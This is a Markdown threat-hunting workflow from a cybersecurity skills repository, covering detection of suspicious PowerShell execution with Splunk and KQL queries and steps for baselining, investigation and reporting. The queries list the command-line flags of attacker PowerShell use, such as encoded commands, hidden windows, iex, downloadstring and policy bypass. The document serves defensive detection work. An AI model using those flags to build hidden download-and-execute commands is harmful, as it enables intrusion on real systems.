mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-06-11 13:44:56 +03:00
mukul975
75 lines
2.9 KiB
Markdown
75 lines
2.9 KiB
Markdown
# Detailed Hunting Workflow - Detecting Suspicious Powershell Execution
|
|
|
|
## Phase 1: Data Collection and Querying
|
|
|
|
### Splunk SPL Query
|
|
```spl
|
|
index=sysmon EventCode=1 Image="*\\powershell.exe"
|
|
| where match(CommandLine, "(?i)(-enc|-encodedcommand|-w hidden|-nop|iex|invoke-expression|downloadstring|webclient|bypass)")
|
|
| table _time Computer User CommandLine ParentImage
|
|
```
|
|
|
|
### KQL Query (Microsoft Defender for Endpoint)
|
|
```kql
|
|
DeviceProcessEvents
|
|
| where FileName =~ "powershell.exe"
|
|
| where ProcessCommandLine has_any ("-enc","-encodedcommand","-w hidden","iex","downloadstring","bypass")
|
|
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
|
|
```
|
|
|
|
## Phase 2: Baseline and Anomaly Detection
|
|
|
|
### Step 2.1 - Establish Normal Behavior Baseline
|
|
- Collect 30 days of historical data for the targeted technique
|
|
- Document expected patterns, frequencies, and legitimate use cases
|
|
- Identify known false positive sources and document exceptions
|
|
- Build statistical baseline (mean, standard deviation) for key metrics
|
|
|
|
### Step 2.2 - Identify Anomalies
|
|
- Compare current activity against the 30-day baseline
|
|
- Flag events exceeding 3 standard deviations from normal
|
|
- Prioritize anomalies by risk score and potential business impact
|
|
- Cross-reference with threat intelligence for known IOCs
|
|
|
|
## Phase 3: Investigation and Correlation
|
|
|
|
### Step 3.1 - Deep Dive Analysis
|
|
- For each anomaly, collect full process tree context
|
|
- Correlate with network activity, file operations, and authentication events
|
|
- Check binary signatures, file hashes, and certificate validity
|
|
- Review user account context and access patterns
|
|
|
|
### Step 3.2 - Attack Chain Reconstruction
|
|
- Map findings to MITRE ATT&CK kill chain stages
|
|
- Identify initial access vector if applicable
|
|
- Trace lateral movement and privilege escalation paths
|
|
- Determine data access and potential exfiltration
|
|
|
|
## Phase 4: Validation and Response
|
|
|
|
### Step 4.1 - True/False Positive Determination
|
|
- Verify findings with system owners and IT operations
|
|
- Check change management records for authorized activities
|
|
- Validate user context (authorized actions vs. compromised account)
|
|
- Document determination rationale for each finding
|
|
|
|
### Step 4.2 - Response Actions
|
|
- For confirmed threats: initiate incident response procedures
|
|
- For detection gaps: create or update detection rules
|
|
- For false positives: tune existing rules and update exclusions
|
|
- Update threat hunting playbook with lessons learned
|
|
|
|
## Phase 5: Documentation and Reporting
|
|
|
|
### Step 5.1 - Hunt Report
|
|
- Summarize hypothesis, methodology, and findings
|
|
- Include all queries executed and their results
|
|
- Document IOCs discovered and detection rules created
|
|
- Provide recommendations for security improvements
|
|
|
|
### Step 5.2 - Knowledge Base Update
|
|
- Add findings to threat intelligence platform
|
|
- Update MITRE ATT&CK coverage heatmap
|
|
- Share detection rules via Sigma format
|
|
- Schedule follow-up hunts for related techniques
|